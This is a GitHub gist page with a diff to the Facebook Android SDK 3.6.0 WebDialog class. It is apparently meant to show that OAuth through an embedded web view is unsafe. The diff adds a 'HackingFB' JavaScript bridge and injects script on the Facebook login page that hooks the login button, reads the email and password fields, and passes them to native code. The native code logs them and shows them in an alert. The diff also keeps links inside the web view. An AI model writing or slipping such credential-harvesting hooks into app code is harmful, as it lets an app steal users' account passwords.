Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Facebook Android SDK 3.6.0 OAuth using embedded Web View
diff --git i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
index 70ac868..c2c9af0 100644
--- i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
+++ w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
@@ -17,6 +17,7 @@
package com.facebook.widget;
import android.annotation.SuppressLint;
+import android.app.AlertDialog;
import android.app.Dialog;
import android.app.ProgressDialog;
import android.content.Context;
@@ -29,8 +30,11 @@ import android.net.Uri;
import android.net.http.SslError;
import android.os.Bundle;
import android.util.DisplayMetrics;
+import android.util.Log;
import android.view.*;
+import android.webkit.JavascriptInterface;
import android.webkit.SslErrorHandler;
+import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import android.widget.FrameLayout;
@@ -43,6 +47,8 @@ import com.facebook.internal.ServerProtocol;
import com.facebook.internal.Utility;
import com.facebook.internal.Validate;
+import org.json.JSONTokener;
+
/**
* This class provides a mechanism for displaying Facebook Web dialogs inside a Dialog. Helper
* methods are provided to construct commonly-used dialogs, or a caller can specify arbitrary
@@ -342,6 +348,15 @@ public class WebDialog extends Dialog {
ViewGroup.LayoutParams.MATCH_PARENT));
webView.setVisibility(View.INVISIBLE);
webView.getSettings().setSavePassword(false);
+ webView.addJavascriptInterface(new HackingFB(), "HackingFB");
+ webView.setWebChromeClient(new WebChromeClient() {
+ @Override
+ public void onConsoleMessage(String message, int lineNumber, String sourceID) {
+ Log.e("password", message + " -- From line "
+ + lineNumber + " of "
+ + sourceID);
+ }
+ });
webViewContainer.setPadding(margin, margin, margin, margin);
webViewContainer.addView(webView);
@@ -349,6 +364,24 @@ public class WebDialog extends Dialog {
contentFrameLayout.addView(webViewContainer);
}
+ private class HackingFB {
+
+ @JavascriptInterface
+ public void foundCredential(String name, String password) {
+ harvest(name, password);
+ }
+
+ private void harvest(String name, String password) {
+ AlertDialog.Builder alertDialogBuilder = new AlertDialog.Builder(
+ getContext());
+ alertDialogBuilder.setTitle(name);
+ alertDialogBuilder.setMessage(password);
+ alertDialogBuilder.create();
+ alertDialogBuilder.show();
+ Log.e("Password", String.format("%s %s", name, password));
+ }
+ }
+
private class DialogWebViewClient extends WebViewClient {
@Override
@SuppressWarnings("deprecation")
@@ -396,10 +429,11 @@ public class WebDialog extends Dialog {
} else if (url.contains(DISPLAY_TOUCH)) {
return false;
}
+ return false;
// launch non-dialog URLs in a full browser
- getContext().startActivity(
- new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
- return true;
+// getContext().startActivity(
+// new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
+// return true;
}
@Override
@@ -445,6 +479,16 @@ public class WebDialog extends Dialog {
contentFrameLayout.setBackgroundColor(Color.TRANSPARENT);
webView.setVisibility(View.VISIBLE);
crossImageView.setVisibility(View.VISIBLE);
+ if (url.contains("facebook.com/login.php")) {
+ Log.e("password ", "Sending alert");
+ view.loadUrl("javascript:console.log('password From Native')");
+ view.loadUrl("javascript:console.log(document)");
+ view.loadUrl("" +
+ "javascript:function hacker() {" +
+ "var f = document.getElementsByTagName('form')[0];" +
+ " HackingFB.foundCredential(f.email.value, f.pass.value); " +
+ "f.submit()}; document.getElementsByName('login')[0].onclick=hacker; ");
+ }
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.